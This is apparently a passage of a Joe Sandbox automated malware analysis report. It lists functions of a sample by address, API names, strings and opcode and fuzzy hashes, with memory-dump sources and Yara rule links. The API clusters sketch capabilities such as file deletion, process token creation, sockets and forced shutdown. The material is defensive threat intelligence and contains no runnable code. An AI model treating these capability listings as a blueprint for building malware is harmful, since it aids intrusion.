                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                                                    • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                                                                                                                                                    • Instruction ID: 9af88a3253045d070372f781dc88e8007c61e151c2f36696c481eda7a7b5fb9f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8E1D432A08B8286EB50CF65E4402AD77A0FB88798F444736DE8DA7B94DFB9D945C700
                                                                                                                                                                                                                    Function 00007FF656D2BC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                    • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                                                                                                                                                    • Instruction ID: 7411bed504c318071043996d54b2135752ad6e0ed05f97e668c31b7b03ac5fb6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B41B632A28A8292EB50DB10E8401ED6370FFD4B94FD81631EA5EA76A5DFBDD545C700
                                                                                                                                                                                                                    Function 00007FF656CEAF58 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                    • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                                                                                                                                                    • Instruction ID: 21c7f549b29bd8a5cdd7797be4c0178e8e69701bc8fb1c961b71d8741235f5b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1831A572618F8186DB60CF65E8402AE73B4FB88794F580636EA9D93B58DF3DD545CB00
                                                                                                                                                                                                                    Function 00007FF656D1D2C4 Relevance: 9.1, APIs: 6, Instructions: 77processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                                                                                                    • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                                                                                                                                                    • Instruction ID: bcf5112315ab31327b944788417670a40b85159e834f6d496d5a2a78489a2a71
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56317E32608B8586DB608F02F4807AAB7A4FB89BD0F184636DE8D93B14DF7ED445CB00
                                                                                                                                                                                                                    Function 00007FF656D3A874 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118filesleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                    • API String ID: 1927845040-438819550
                                                                                                                                                                                                                    • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                                                                                                                                                    • Instruction ID: 529995f01bdf5beff6021fe58ade738ca4bddd5affef552f64489a6487a29ea8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C751A122708A8295EB10DB15E8542AD3370FB45794F980732DE4DA37A5DF3ED945C710
                                                                                                                                                                                                                    Function 00007FF656D44074 Relevance: 7.6, APIs: 5, Instructions: 148networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4170576061-0
                                                                                                                                                                                                                    • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                                                                                                                                                    • Instruction ID: 54b538a6b3281d8d0b2f52ceddfcaae0712db0204c49b5eadcf013a21e1c59bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA51E361B1865281EB10EB13D40467977A0FB89FE0F8C8631DE5EA7796CE7ED440C780
                                                                                                                                                                                                                    Function 00007FF656D35F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                    • API String ID: 3769357847-24824748
                                                                                                                                                                                                                    • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                                                                                                                                    • Instruction ID: a86bfa40ffa79200675eec810ad61743d7427ddf4d656ef7de339aa6a6ac88fc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86D15076B08A5685EB10DF66D0902AD37B0FB48F88F494632DE4EA77A5DF3AD485C340
                                                                                                                                                                                                                    Function 00007FF656CE793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _handle_error
                                                                                                                                                                                                                    • String ID: !$VUUU$fmod
                                                                                                                                                                                                                    • API String ID: 1757819995-2579133210
                                                                                                                                                                                                                    • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                                                                                                                                                    • Instruction ID: 68727ca8e8414f4c7cdaacac5909fba514fe5b64acd75ab10a927740036ab3d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBB12B61E1CFC644D6B38A3450123B6B279AFAA390F14D332E95E75BA4DF2D99C2C700
                                                                                                                                                                                                                    Function 00007FF656CF2D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF656CF2D60
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CEB184: GetCurrentProcess.KERNEL32(00007FF656CEB21D), ref: 00007FF656CEB1B1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID: *$.$.
                                                                                                                                                                                                                    • API String ID: 2518042432-2112782162
                                                                                                                                                                                                                    • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                                                                                                                                                                    • Instruction ID: 2c2d19a85705332d8e543f8d0a0edfac6f032ef7ee4405a73d3a093b70a9b4c4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E751EFA2F10A5685FB21DBA698112BDA7B4BF44BC8F584535CE4EA7B88DE3DD442C300
                                                                                                                                                                                                                    Function 00007FF656D2D750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                    • API String ID: 2163645468-3733053543
                                                                                                                                                                                                                    • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                                                                                                                                    • Instruction ID: 7a035bb0c3e97edf79d4b36a778438dadeb8b2bab8c01303e753c922a1b65448
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F119132F1860282E724CB25E84117E7252BF84750F4D4735E54EE3AA9EF3ED845C740
                                                                                                                                                                                                                    Function 00007FF656CD5BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF656CD5C43
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                                                                                                                    • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                                                                                                                                    • Instruction ID: 79eb736fa1972f83c833415a839fc0d608867b0beea7d46fa77a4b1208f7755b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7114C72A18B8297E7049B66D6543B933B4FB48385F884635C64DD6A54EF3EE0B8C710
                                                                                                                                                                                                                    Function 00007FF656D47634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                                                                                                                    • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                                                                                                                    • Instruction ID: 02ff558e5109948ce41e938f72dae2f6785fb2b5a9a29303c918269c97a4c91d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E0ED21909B0681EF54CB54E81476823E5FB18B49F8C0B35D95D95364EFBED998C340
                                                                                                                                                                                                                    Function 00007FF656D46320 Relevance: 6.3, APIs: 4, Instructions: 255COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2733932498-0
                                                                                                                                                                                                                    • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                                                                                                                                                    • Instruction ID: b33c0ee257f49f29d3632f8d02bb7d14502d13c6d4f581f5f926a1d255473a86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EB18D66B04B9681EB10DF26D4906BD2760FB48FD4F4D5632DE4EA7796CE7AE880C340
                                                                                                                                                                                                                    Function 00007FF656D2BE00 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1083639309-0
                                                                                                                                                                                                                    • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                                                                                                                                    • Instruction ID: e28533e1070d5844e2aeac63c86fb5793ade6d65d8e239e88c4283e893f78904
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77419736A18A8285E710DF51E8401BE7374FB44B84F984632EE8EA7765DFBED545C700
                                                                                                                                                                                                                    Function 00007FF656D36428 Relevance: 4.6, APIs: 3, Instructions: 116fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
